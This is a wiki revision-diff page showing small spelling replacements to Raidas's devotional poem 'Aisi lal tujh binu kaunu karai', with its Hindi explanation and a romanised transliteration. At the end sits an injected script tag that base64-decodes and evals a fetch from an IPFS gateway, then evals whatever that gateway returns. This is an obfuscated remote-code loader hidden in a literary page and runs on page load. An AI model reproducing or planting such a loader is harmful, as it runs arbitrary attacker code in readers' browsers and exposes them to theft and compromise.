Difference between revisions of "ऐसी लाल तुझ बिनु कउनु करै -रैदास"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - " जगत " to " जगत् ")
m (Text replacement - " गरीब" to " ग़रीब")
 
Line 41: Line 41:
 
{{Poemclose}}
 
{{Poemclose}}
 
==व्याख्यान==
 
==व्याख्यान==
हे प्रभु ! तुम्हारे बिना कौन ऐसा कृपालु है जो भक्त के लिए इतना बडा कार्य कर सकता है । तुम गरीब तथा दिन – दुखियों पर दया करने वाले हो । तुम ही ऐसा कृपालु स्वामी हो जो मुझ जैसे अछूत और नीच के माथे पर राजाओं जैसा छत्र रख दिया । तुम मुझे राजाओं जैसा सम्मान प्रदान कर दिया । मैं अभाग हूँ । मुझ पर तुम्हारी कृपा असीम है । तुम मुझ पर द्रवित हो गए । हे स्वामी तुमने मुझ जैसे नीच प्राणी को इतना उच्च सम्मान प्रदान किया । तुम्हारी दया से नामदेव , कबीर जैसे जुलाहे , त्रिलोचन जैसे सामान्य , सधना जैसे कसाई और सैन जैसे नाई संसार से तर गए । उन्हें ज्ञान प्राप्त हो गया । रैदास कह्ते हैं – हे संतों , सुनो ! हरि जी सब कुछ करने में समर्थ हैं । वे कुछ भी सकते हैं ।  
+
हे प्रभु ! तुम्हारे बिना कौन ऐसा कृपालु है जो भक्त के लिए इतना बडा कार्य कर सकता है । तुम ग़रीब तथा दिन – दुखियों पर दया करने वाले हो । तुम ही ऐसा कृपालु स्वामी हो जो मुझ जैसे अछूत और नीच के माथे पर राजाओं जैसा छत्र रख दिया । तुम मुझे राजाओं जैसा सम्मान प्रदान कर दिया । मैं अभाग हूँ । मुझ पर तुम्हारी कृपा असीम है । तुम मुझ पर द्रवित हो गए । हे स्वामी तुमने मुझ जैसे नीच प्राणी को इतना उच्च सम्मान प्रदान किया । तुम्हारी दया से नामदेव , कबीर जैसे जुलाहे , त्रिलोचन जैसे सामान्य , सधना जैसे कसाई और सैन जैसे नाई संसार से तर गए । उन्हें ज्ञान प्राप्त हो गया । रैदास कह्ते हैं – हे संतों , सुनो ! हरि जी सब कुछ करने में समर्थ हैं । वे कुछ भी सकते हैं ।  
 
{| width="100%"
 
{| width="100%"
 
|-
 
|-

Latest revision as of 09:20, 12 April 2018

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"
aisi lal tujh binu kunu karai -raidas
kavi raidas
janm 1398 ee. (lagabhag)
janm sthan kashi, uttar pradesh
mrityu 1518 ee.
inhean bhi dekhean kavi soochi, sahityakar soochi
raidas ki rachanaean

aisi lal tujh binu kunu karai .
garib nivaju gusaeea mera mathai chhatru dharai ॥
jaki chhoti jagath ku lagai ta par tuhian dharai .
nichu ooch karai mera gobiandu kahoo te n darai ॥
namadev kabiroo tilochanu sadhana sainu tarai .
kahi ravidasu sunahu re santahu harijiu te sabhai sarai ॥

vyakhyan

he prabhu ! tumhare bina kaun aisa kripalu hai jo bhakt ke lie itana bada kary kar sakata hai . tum garib tatha din – dukhiyoan par daya karane vale ho . tum hi aisa kripalu svami ho jo mujh jaise achhoot aur nich ke mathe par rajaoan jaisa chhatr rakh diya . tum mujhe rajaoan jaisa samman pradan kar diya . maian abhag hooan . mujh par tumhari kripa asim hai . tum mujh par dravit ho ge . he svami tumane mujh jaise nich prani ko itana uchch samman pradan kiya . tumhari daya se namadev , kabir jaise julahe , trilochan jaise samany , sadhana jaise kasaee aur sain jaise naee sansar se tar ge . unhean jnan prapt ho gaya . raidas kahte haian – he santoan , suno ! hari ji sab kuchh karane mean samarth haian . ve kuchh bhi sakate haian .

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>